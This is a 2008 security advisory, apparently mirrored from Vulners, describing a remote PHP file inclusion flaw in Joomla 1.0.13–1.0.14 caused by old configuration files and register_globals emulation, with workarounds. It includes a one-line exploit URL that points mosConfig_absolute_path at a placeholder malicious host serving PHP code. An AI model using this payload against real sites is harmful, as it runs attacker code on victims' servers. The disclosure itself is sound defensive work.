joomlaoldconfig-rfi.txt

Description

`Affects: Joomla 1.0.13 - 1.0.14
Vulnerability: (remote) PHP file inclusion possible if old
configuration.php
Date: 14-feb-2008
Introduction:
Remote PHP file inclusion is possible when RG_EMULATION is not defined
in
configuration.php. This is typical when upgrading from an older version,
leaving configuration.php untouched. Furthermore, in PHP,
register_globals
must be 'off', for this exploit to work.
In Joomla &gt;=1.0.13, configuration.php-dist disables register_globals
emulation, by defining RG_EMULATION false. In older Joomla versions,
this
was defined in globals.php instead.
Users upgrading, without touching configuration.php (quite typical),
will have RG_EMULATION
unset, resulting in the following vulnerability.
In Revision 7424 of globals.php, the 'configuration.php' file is
included
before registerGlobals() is called, allowing a malicious peer to
override any value set in configuration.php.
Details:
Since revision 7424, globals.php includes 'configuration.php' if
RG_EMULATION is unset, and enables RG_EMULATION by default for 'old
configuration files':
if( defined( 'RG_EMULATION' ) === false ) {
if( file_exists( dirname(__FILE__).'/configuration.php' ) ) {
require( dirname(__FILE__).'/configuration.php' );
}
if( defined( 'RG_EMULATION' ) === false ) {
// The configuration file is old so default to on
define( 'RG_EMULATION', 1 );
}
}
The registerGlobals function is called *after* having included
'configuration.php':
} else if (ini_get('register_globals') == 0) {
// php.ini has register_globals = off and emulate = on
registerGlobals();
Maliciously set GET variables cause variables set by configuration.php
to be overwritten.
Looking in index.php:
require( 'globals.php' );
require_once( 'configuration.php' );
Since 'configuration.php' was already included by globals.php, the
require_once() won't include the configuration.php again (leaving
"attacker's" values untouched!).
The exploit:
http://joomlasite/index.php?mosConfig_absolute_path=http://malhost/php_s
cript.txt
Workaround:
In index*.php and administrator/index*.php change:
require_once( 'configuration.php' );
to
require('configuration.php');
Or disable RG_EMULATION by using the line in configuration.php-dist in
configuration.php:
if(!defined('RG_EMULATION')) { define( 'RG_EMULATION', 0 ); } // Off by
default for security
Regards,
Hendrik-Jan Verheij
BWSS B.V.
`

All product names, logos, and brands are property of their respective owners. All company, product and service names used in this website are for identification purposes only. Use of these names, logos, and brands does not imply endorsement.If you are an owner of some content and want it to be removed, please mail to content@vulners.com Vulners, 2018